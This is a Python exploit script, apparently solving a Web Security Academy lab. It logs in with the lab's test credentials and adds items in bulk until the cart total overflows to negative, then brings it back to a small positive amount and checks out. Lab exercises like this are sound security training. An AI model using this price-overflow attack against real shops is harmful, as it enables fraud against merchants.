1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
| from bs4 import BeautifulSoup
from urllib.parse import urljoin
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Define Variables
base_url = 'https://0a4c001e030d58a4847c65e80013002f.web-security-academy.net/'
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
# Get CSRF Token
def get_csrf_token(session, url):
response = session.get(url, proxies=proxies, verify=False)
csrf_token = BeautifulSoup(response.text, 'html.parser').find('input', {'name': 'csrf'}).get('value')
return csrf_token
# Get Items Total Price
def get_total(session):
cart_url = urljoin(base_url, 'cart')
response = session.get(cart_url, proxies=proxies, verify=False)
soup = BeautifulSoup(response.content, 'html.parser')
total_element = soup.find('th', string='Total:')
if total_element:
total_text = total_element.find_next_sibling('th').text
total_value = total_text.replace('$', '')
return float(total_value)
else:
return None
# Purchase Item
def purchase_item(session, url):
# Login
login_url = urljoin(base_url, 'login')
login_csrf_token = get_csrf_token(session, login_url)
login_payload = {'username': 'wiener', 'password': 'peter', 'csrf': login_csrf_token}
login_response = session.post(login_url, data=login_payload, proxies=proxies, verify=False)
if login_response.status_code == 200:
cart_url = urljoin(base_url, 'cart')
while True:
# Add first item
cart_payload1 = {'productId': '1', 'redir': 'PRODUCT', 'quantity': '99'}
session.post(cart_url, data=cart_payload1, proxies=proxies, verify=False)
# Check total
total = get_total(session)
if -70000 < total < 0:
break
while True:
# Add second item
cart_payload2 = {'productId': '2', 'redir': 'PRODUCT', 'quantity': '58'}
session.post(cart_url, data=cart_payload2, proxies=proxies, verify=False)
# Check total again
total = get_total(session)
if -4000 < total < 100:
break
while True:
# Add third item
cart_payload3 = {'productId': '3', 'redir': 'PRODUCT', 'quantity': '17'}
session.post(cart_url, data=cart_payload3, proxies=proxies, verify=False)
# Check total again
total = get_total(session)
if 0 < total < 100:
# Checkout
checkout_url = urljoin(base_url, 'cart/checkout')
checkout_csrf_token = get_csrf_token(session, cart_url)
checkout_payload = {'csrf': checkout_csrf_token}
checkout_response = session.post(checkout_url, data=checkout_payload, proxies=proxies, verify=False)
if checkout_response.status_code == 200:
print("Purchase successful!")
else:
print("Failed to checkout.")
break
else:
print("Failed to log in.")
def main():
session = requests.Session()
purchase_item(session, base_url)
if __name__ == "__main__":
main()
|